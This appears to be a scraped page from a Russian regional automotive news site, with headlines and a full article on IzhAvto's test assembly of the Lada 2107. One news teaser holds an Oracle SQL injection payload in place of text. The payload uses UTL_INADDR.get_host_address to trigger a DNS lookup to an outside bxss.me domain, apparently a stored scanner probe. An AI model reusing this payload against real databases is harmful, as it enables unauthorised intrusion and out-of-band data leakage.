Главная     Мототехника     Автофирмы     Полезное     Автострахование     Доска обьявлений     Реклама     Автотюнинг     Карта сайта    
Предложения
Всего: 9 Посмотреть »

Личный кабинет

Погода

Предложения

Загрузка предложений ...

Партнёры

SolarStyle Studio разработка сайтов, хостинг, домены, дизайн.

Некоторые автоновости
28 апреля 2010г.
Компания Peugeot разработала спецверсию модели 308 для России

Компания Peugeot объявила о начале продаж специальной модификации модели 308, разработанной специально для российского рынка и получившей название Russian Pack.
Подробнее »
12 апреля 2010г.
Автомобильные технологии будущего.

Говоря о технологиях, способных улучшить ситуацию с безопасностью, одну из основных задач разработчики видят в том, чтобы «удержать» нас на одной полосе или вообще на дороге в особо тяжелых случаях.
Подробнее »
30 августа 2019г.
Mr.

1||UTL_INADDR.get_host_address('dns.'||'sqli.013405.529-41388.529.a9e86.1.bxss'||'.me')
Подробнее »
«ИжАвто» начал тестовую сборку Lada 2107
Ижевский автозавод начал тестовую сборку автомобилей Lada 2107 – с конвейера предприятия сошел первый «пилот». До конца месяца «ИжАвто» планирует выпустить в тестовом режиме 43 автомобиля Lada 2107. А в апреле начнется промышленное производство «семерок». План на апрель составляет 200 автомобилей Lada 2107. Как отмечается, производство «семерки» будет осуществляться в едином потоке с автомобилями Lada 2104 и фургонами ИЖ-27175.
Напомним, в феврале Ижевский автозавод выпустил 2779 машин, в январе – 425 штук. План на март предусматривает производство 2,8 тысячи автомобилей. По данным АЕБ, за первые два месяца 2011 года на российском рынке было продано 2899 автомобилей Lada 2104 и ИЖ-27175.

Источник: АВТОСТАТ
Реклама










Быстрый поиск

Загрузка поиска ...

Автофирмы Ставрополь

Загрузка автофирм...

Автоновости

Загрузка новостей...

Реклама

    Руководитель сайта: Артёмов Владимир Николаевич Разработка и поддержка сайта - SolarStyle Studio   
Rambler's Top100 Яндекс.Метрика